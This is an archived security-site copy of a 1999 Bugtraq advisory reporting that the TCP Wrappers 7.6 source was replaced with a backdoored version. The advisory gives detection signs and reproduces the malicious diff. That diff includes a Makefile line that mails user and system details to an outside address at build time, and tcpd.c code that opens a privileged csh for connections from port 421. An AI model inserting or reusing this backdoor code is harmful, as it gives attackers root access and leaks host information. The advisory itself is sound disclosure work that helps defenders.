Twenty Year Anniversary

tcpwrapper-backdoor.txt

tcpwrapper-backdoor.txt
Posted Aug 17, 1999

Backdoored TCP Wrapper source code discovered. Although only 52 people downloaded this code from ftp.win.tue.nl (all have been notified), this notice serves as an excellent reminder that you should ALWAYS verify the PGP and file signatures of ANY software that you download. The backdoor exploit code is included in this file.

tags | exploit, tcp
MD5 | c1f87f7e57405e2a8940cf49b505b54e

tcpwrapper-backdoor.txt

Change Mirror Download
Date: Thu, 21 Jan 1999 11:38:17 -0500
From: Wietse Venema <wietse@PORCUPINE.ORG>
To: BUGTRAQ@netspace.org
Subject: backdoored tcp wrapper source code

TCP Wrappers is a widely-used security tool to protect UNIX systems
against intrusion. In has an estimated installed base of millions.

Today someone replaced the tcp wrapper source on ftp.win.tue.nl by
a backdoored version. Eventually this was bound to happen, and
that's why the source file is accompanied by a PGP signature. But
that is no guarantee against people downloading and installing
backdoored software.

The backdoor gives access to a privileged shell when a client
connects from port 421.

The backdoored copy was downloaded 52 times between 07:16 MET and
16:29 MET. I have informed the sites that downloaded a copy.

Below are details on how to recognize the backdoored version.

Wietse

Relevant time stamp/size information (times relative to MET):

Backdoored version:

% ls -lcta
-r--r--r-- 1 wswietse 99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
...
dr-xr-sr-x 3 wswietse 4096 Apr 11 1998 .

Restored version:

% ls -lt tcp_wrappers_7.6.tar.gz
-r--r--r-- 1 wswietse 99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz

The signature of the bad TAR file is: length 99186 instead of 99438.
The signature of a compiled tcpd binary is:

strings -a tcpd | grep csh

any output probably means trouble.

Changes that were made to the tcp wrapper 7.6 source code:

diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
*** 7.6/Makefile Mon Apr 7 20:34:16 1997
--- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997
***************
*** 26,31 ****
--- 26,32 ----
@echo
@echo "If none of these match your environment, edit the system"
@echo "dependencies sections in the Makefile and do a 'make other'."
+ @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com'
@echo

#######################################################
***************
*** 649,655 ****
# source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
# Solaris 2.x, and Linux. See your system documentation for details.
#
! KILL_OPT= -DKILL_IP_OPTIONS

## End configuration options
############################
--- 650,656 ----
# source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
# Solaris 2.x, and Linux. See your system documentation for details.
#
! # KILL_OPT= -DKILL_IP_OPTIONS

## End configuration options
############################
Only in 7.6: Makefile-
diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
*** 7.6/tcpd.c Sun Feb 11 11:01:33 1996
--- /tmp/tcp_wrappers_7.6/tcpd.c Sun Feb 11 11:01:33 1996
***************
*** 41,52 ****
--- 41,63 ----
int allow_severity = SEVERITY; /* run-time adjustable */
int deny_severity = LOG_WARNING; /* ditto */

+ char IDENT[]="NC421\n";
+ char SRUN[]="-csh";
+ char SPATH[]="/bin/csh";
+ #define PORT 421
+
main(argc, argv)
int argc;
char **argv;
{
struct request_info request;
+ struct sockaddr_in from;
char path[MAXPATHNAMELEN];
+ int fromlen;
+
+ fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
+ &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
+ strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}

/* Attempt to prevent the creation of world-writable files. */

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close